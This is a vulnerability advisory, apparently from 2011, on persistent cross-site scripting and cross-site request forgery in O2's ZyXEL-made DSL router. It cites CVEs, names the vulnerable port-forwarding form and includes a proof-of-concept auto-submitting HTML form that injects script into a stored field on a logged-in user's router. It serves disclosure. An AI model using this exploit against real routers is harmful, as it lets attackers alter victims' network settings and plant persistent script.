O2 Classic Router Cross Site Request Forgery / Cross Site Scripting

`O2 classic router: persistent cross site scripting (XSS) and cross site  
request forgery (CSRF)  
  
References  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1482  
http://int21.de/cve/CVE-2011-0746-o2-router.html  
  
Description  
  
The default DSL router shipped by the german company O2 is completely  
vulnerable to persistent cross site scripting (XSS) and cross site  
request forgery (CSRF). The device is produced by ZyXEL, it seems it  
has no other name than the brand "O2 DSL Router Classic".  
  
As an example, the form at /Forms/PortForwarding_Edit_1 accepts  
javascript code for the parameter PortRule_Name, which will be  
permanently stored. Also, the form has no protection against CSRF.  
  
A sample code that will inject permanent javascript when called by a  
user who is logged into his router:  
  
<form id="form1" method="post"  
action="http://192.168.1.1/Forms/PortForwarding_Edit_1"> <input  
name="PortRule_Name" value='"><script>alert(7)</script>'> <input  
name="PortRule_SPort" value="77"> <input name="PortRule_EPort"  
value="77"> <input name="PortRule_SrvAddr" value="10.0.0.1" >  
<script>  
var frm = document.getElementById("form1");  
frm.submit();  
</script>  
This is just an example, all forms in the router interface are  
vulnerable to CSRF and, if they accept text input, to XSS.  
  
The vulnerability has been disclosed to O2 in advance without any reply.  
  
Disclosure Timeline  
  
2011-02-03: Vendor contacted  
2011-04-07: Published advisory  
  
This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de,  
of schokokeks.org webhosting.  
  
  
`